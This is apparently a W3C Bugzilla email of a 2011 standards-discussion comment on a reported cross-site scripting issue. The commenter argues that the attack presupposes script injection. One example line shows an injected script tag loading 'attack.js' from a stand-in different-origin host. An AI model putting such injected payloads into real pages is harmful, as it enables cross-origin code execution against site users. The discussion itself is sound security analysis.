
[Bug 12469] Dynamic Cross-Site Scripting and Page Repainting

From: <bugzilla@jessica.w3.org>
Date: Tue, 12 Apr 2011 09:08:02 +0000
To: public-html-bugzilla@w3.org
Message-Id: <E1Q9ZZq-0004h9-0x@jessica.w3.org>

--- Comment #7 from Henri Sivonen <hsivonen@iki.fi> 2011-04-12 09:08:00 UTC ---
(In reply to comment #6)
> However, with respect, I think you have misinterpreted the idea of this
> exploit. The recvPayload function is in fact part of the injected code.

Ah. In that case, the attack needs the ability to inject a <script> element to
succeed. If you let the attacker inject a <script>, you have already lost
regardless of cross-document messaging. The injected script could load its
payload by using <script src="http://different-origin.example.com/attack.js">
which allows code to be loaded cross-origin.

Received on Tuesday, 12 April 2011 09:08:03 UTC
